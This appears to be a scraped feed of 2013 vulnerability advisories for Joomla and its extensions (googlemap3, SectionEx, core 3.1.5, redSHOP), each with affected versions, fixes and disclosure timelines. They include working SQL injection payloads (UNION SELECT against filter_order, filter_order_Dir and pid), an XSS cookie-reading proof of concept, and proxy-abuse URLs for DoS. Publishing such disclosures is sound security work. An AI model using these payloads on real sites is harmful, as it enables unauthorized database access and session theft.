http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1 Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html). Cross-Site Scripting (WASC-08): http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1 Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua |
↧
↧
Joomla SectionEx 2.5.96 SQL Injection
------------------------------------------------------------------------------------- Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities ------------------------------------------------------------------------------------- == Description == - Software link: http://stackideas.com/sectionex - Affected versions: version 2.5.96 is vulnerable. Other versions might be affected as well. - Author: Matias Fontanini == Vulnerabilities == When using the "category" view, the component does not correctly sanitize the "filter_order" and "filter_order_Dir" parameters before using them to construct SQL queries, making it vulnerable to SQL Injection attacks. In order to exploit these vulnerabilities, an attacker could perform requests like the following ones: - For the "filter_order" parameter: POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y filter_title=&filter_content=&limit=0§ionid=20&filter_order=1 limit 1 offset 10000) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23&filter_order_Dir=DESC - For the "filter_order_Dir" parameter: POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y filter_title=&filter_content=&limit=0§ionid=20&filter_order=1&filter_order_Dir=DESC limit 1 offset 10000) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23 == Solution == Upgrade the product to the 2.5.104 version. == Report timeline == [2013-07-30] Vulnerabilities reported to the developers. [2013-07-30] Developers answered back indicating that a new release would be made soon. [2013-08-01] SectionEx 2.5.104 was released, which fixed the issues reported. [2013-08-05] Public disclosure. |
↧
Joomla 3.1.5 Cross Site Scripting
============================================================ - Original release date: August 05, 2013 - Discovered by: Emilio Pinna (Application Security Analyst at Abinsula) - Contact: (emilio (dot) pinn (at) gmail (dot) com) - Severity: 4.3/10 (Base CVSS Score) ============================================================ VULNERABILITY ------------------------- Joomla core package <= 3.1.5 includes a PHP script that suffers from reflected XSS vulnerability that allows to inject HTML and malicious scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Joomla is one of the most installed CMS with dozens of millions of installations. DESCRIPTION ------------------------- Affected file libraries/idna_convert/example.php has different injection points: - Unsanitized lang parameter in line 24 - Unsanitized file name printing on lines 112 and 119 PROOF OF CONCEPT ------------------------- http://localhost/joomla/libraries/idna_convert/example.php?lang="><script>alert(document.cookie);</script><!-- BUSINESS IMPACT ------------------------- As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session that visits the malicious crafted url. SYSTEMS AFFECTED ------------------------- Joomla-CMS <= 3.1.5 SOLUTION ------------------------- Fixed removing the vulnerable example file on git with commit c00c033d33d901e1ca6be9061a44e55acd041b1f REFERENCES ------------------------- http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/ https://github.com/joomla/joomla-cms/issues/1658 CREDITS ------------------------- Emilio Pinna (emilio (dot) pinn (at) gmail (dot) com) DISCLOSURE TIMELINE ------------------------- August 4, 2013: Opened a ticket describing the bug by Adam Willard. August 5, 2013: Fixed by Michael Babker. August 5, 2013: Vulnerability disclosed by Emilio Pinna. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. |
↧
Joomla redSHOP 1.2 SQL Injection
-------------------------------------------- Joomla! redSHOP component v1.2 SQL Injection -------------------------------------------- == Description == - Product: Joomla! redSHOP component - Product link: http://redcomponent.com/redcomponent/redshop - Vendor: redcomponent - Affected versions: version 1.2 is vulnerable. Other versions might be affected as well. - Vulnerability discovered by: Matias Fontanini == Vulnerability == When using the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks. The following proof of concept request retrieves the database user, name and version: http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 == Solution == Upgrade the product to the 1.3 version. == Report timeline == [2013-08-02] Vulnerability reported to vendor. [2013-08-02] Developers answered back indicating that an update would be released soon. [2013-08-06] redSHOP 1.3 was released, which fixes the reported issue. [2013-08-08] Public disclosure. |
↧